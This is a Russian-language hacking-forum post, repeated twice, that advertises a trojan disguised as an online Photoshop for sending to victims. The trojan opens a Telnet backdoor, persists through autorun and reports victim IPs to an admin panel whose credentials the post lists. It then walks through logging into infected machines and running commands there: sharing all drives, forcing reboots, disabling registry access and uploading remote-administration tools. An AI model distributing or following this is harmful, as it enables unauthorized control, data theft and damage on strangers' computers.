Vlad&slav
27.10.2009, 19:04
Хотите пошалить в чужих компах на халяву? (Telnet)
Адрес: http://telnetlog.tk/
Логин: admin
Пароль: 123456000
В админке вы можете увидеть IP адреса ,
логин и пароль , порт 972(новые сверху)
Это данные для подключения к чужому компу.
Также вверху есть :
[ MAIN ] - Главная
[ INGECT ] - извлеч список IP адресов чтобы загрузить их куда либо (например хспайдер)
[ FAIL ] - это ссылка скачивания фаила самого вируса для открытия телнета, вирус замаскирован под онлайн фотошоп (ниже подробней)
[ PATCH ] - Превращение Win-xp-sp2 в сервер терминалов (или троян от Мелкомягких) подробней тут http://forum.antichat.ru/thread36042.html
Сам фаил вируса:
Его вы можете кинуть неприятелю или разослать где-либо. После этого в админке появится новый IP к которому вы сможете подключиться через телнет.
Также вирус прописывает себя в автозапуск и отстукивает IP при перезагрузке компа жертвы.
Админка сама очищяется через определённое время (внизу написано).
Отчёт с вирустотола http://dumpz.org/13735/ .
Как подключиться и что делать.
Пуск -> Выполнить -> Telnet
в нём пишим open 100.100.100.100 972
если соединение есть то у вас запросят логин и пароль
логин: suser
пароль: 123456 (когда вводите не отображается)
Появляется надпись:
*================================================= ====
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*================================================= ====
C:>_
Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять кампом, отдавая команды...
Можно к примеру расшарить диски:
C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul
перезагрузить комп:
C:>shutdown -r -t 1 -c -f
прописать какой-нибудь ключ реестра:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v
DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему
или поднять ftp сервер и залить радмина для более удобного удаленного
администрирования:
C:>ftp
В общем-то, здесь уже играет фантазия взломщика =)
Делал для себя но пользуюсь мало. Пусть учатся новички работать с консолью. Если можно перенестите в релизы :)
icq 1000011101101111100110 в бинарной :D
http://s51.radikal.ru/i131/0910/7b/755d64362720.jpg
http://s56.radikal.ru/i152/0910/6e/311b7a0b1096.jpg
http://i009.radikal.ru/0910/6e/270a7e6c03ea.jpg
Адрес: http://telnetlog.tk/
Логин: admin
Пароль: 123456000
В админке вы можете увидеть IP адреса ,
логин и пароль , порт 972(новые сверху)
Это данные для подключения к чужому компу.
Также вверху есть :
[ MAIN ] - Главная
[ INGECT ] - извлеч список IP адресов чтобы загрузить их куда либо (например хспайдер)
[ FAIL ] - это ссылка скачивания фаила самого вируса для открытия телнета, вирус замаскирован под онлайн фотошоп (ниже подробней)
[ PATCH ] - Превращение Win-xp-sp2 в сервер терминалов (или троян от Мелкомягких) подробней тут http://forum.antichat.ru/thread36042.html
Сам фаил вируса:
Его вы можете кинуть неприятелю или разослать где-либо. После этого в админке появится новый IP к которому вы сможете подключиться через телнет.
Также вирус прописывает себя в автозапуск и отстукивает IP при перезагрузке компа жертвы.
Админка сама очищяется через определённое время (внизу написано).
Отчёт с вирустотола http://dumpz.org/13735/ .
Как подключиться и что делать.
Пуск -> Выполнить -> Telnet
в нём пишим open 100.100.100.100 972
если соединение есть то у вас запросят логин и пароль
логин: suser
пароль: 123456 (когда вводите не отображается)
Появляется надпись:
*================================================= ====
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*================================================= ====
C:>_
Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять кампом, отдавая команды...
Можно к примеру расшарить диски:
C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul
перезагрузить комп:
C:>shutdown -r -t 1 -c -f
прописать какой-нибудь ключ реестра:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v
DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему
или поднять ftp сервер и залить радмина для более удобного удаленного
администрирования:
C:>ftp
В общем-то, здесь уже играет фантазия взломщика =)
Делал для себя но пользуюсь мало. Пусть учатся новички работать с консолью. Если можно перенестите в релизы :)
icq 1000011101101111100110 в бинарной :D
http://s51.radikal.ru/i131/0910/7b/755d64362720.jpg
http://s56.radikal.ru/i152/0910/6e/311b7a0b1096.jpg
http://i009.radikal.ru/0910/6e/270a7e6c03ea.jpg